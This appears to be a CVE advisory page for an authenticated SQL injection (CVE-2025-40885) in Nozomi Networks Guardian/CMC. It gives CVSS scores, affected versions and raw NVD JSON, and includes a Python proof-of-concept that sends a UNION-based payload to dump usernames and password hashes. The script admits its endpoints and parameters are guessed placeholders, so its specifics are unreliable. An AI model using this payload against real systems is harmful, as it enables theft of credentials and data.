Security Vulnerability Report
CVE-2025-40885 CVSS 5.3 MEDIUM

CVE-2025-40885

Published: 2025-10-07 13:15:34
Last Modified: 2025-10-09 16:38:33

Description

A SQL Injection vulnerability was discovered in the Smart Polling functionality due to improper validation of an input parameter. An authenticated user with limited privileges can execute arbitrary SELECT SQL statements on the DBMS used by the web application, potentially exposing unauthorized data.

Weakness: CWE-89 (SQL Injection)

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N
Note: the 5.3 score and vector above are the vendor-supplied (secondary) CVSS 3.1 assessment. NVD's primary CVSS 3.1 assessment rates attack complexity as Low (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) for a base score of 6.5 MEDIUM, and the vendor's CVSS 4.0 vector scores 6.0 MEDIUM; both appear in the raw JSON data at the end of this report.

Configurations (Affected Products)

cpe:2.3:a:nozominetworks:cmc:*:*:*:*:*:*:*:* - VULNERABLE (versions before 25.2.0, per the NVD configuration data)
cpe:2.3:a:nozominetworks:guardian:*:*:*:*:*:*:*:* - VULNERABLE (versions before 25.2.0, per the NVD configuration data)
Nozomi Networks Guardian/CMC - affected versions of the Smart Polling functionality (refer to the official advisory NN-2025:6-01 for specific version information)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-40885 - Nozomi Networks Smart Polling SQL Injection PoC
# Author: Security Research
# Description: Demonstrates SQL injection in Smart Polling functionality
import requests

# NOTE: the host, endpoint paths and parameter names below are placeholders
# assumed by this PoC; they are not confirmed by the vendor advisory.
TARGET_URL = "https://target-nozomi-instance.com"
USERNAME = "low_priv_user"
PASSWORD = "password123"


def exploit_sqli():
    # Step 1: Authenticate to obtain session
    session = requests.Session()
    login_url = f"{TARGET_URL}/api/v1/auth/login"
    login_data = {"username": USERNAME, "password": PASSWORD}
    resp = session.post(login_url, json=login_data, verify=False)
    if resp.status_code != 200:
        print("[-] Authentication failed")
        return
    print("[+] Authenticated successfully")

    # Step 2: Exploit SQL injection in Smart Polling parameter
    # The vulnerable parameter is typically the polling target/filter parameter
    polling_url = f"{TARGET_URL}/api/v1/smart-polling/execute"
    # Malicious payload using UNION-based SQL injection
    # Attempts to append rows from a users table to the query result
    sqli_payload = "1' UNION SELECT username, password_hash, email FROM users-- -"
    payload_data = {"polling_target": sqli_payload, "interval": 60}
    resp = session.post(polling_url, json=payload_data, verify=False)
    if resp.status_code == 200:
        print("[+] SQL Injection successful!")
        print(f"[+] Response: {resp.text}")
        # Parse leaked data from response
    else:
        print(f"[-] Exploit failed with status: {resp.status_code}")


if __name__ == "__main__":
    exploit_sqli()
```

References

https://security.nozominetworks.com/NN-2025:6-01 (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-40885",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-07T13:15:34.403",
    "lastModified": "2025-10-09T16:38:33.253",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A SQL Injection vulnerability was discovered in the Smart Polling functionality due to improper validation of an input parameter. An authenticated user with limited privileges can execute arbitrary SELECT SQL statements on the DBMS used by the web application, potentially exposing unauthorized data."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 6.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "attackRequirements": "PRESENT",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.6,
          "impactScore": 3.6
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:nozominetworks:cmc:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "25.2.0",
                "matchCriteriaId": "6EE8E12E-EBAC-4B34-9D31-F68195E1F5CF"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:nozominetworks:guardian:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "25.2.0",
                "matchCriteriaId": "81AC5154-CA70-4917-8B33-D7AD5B57C683"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://security.nozominetworks.com/NN-2025:6-01",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}
```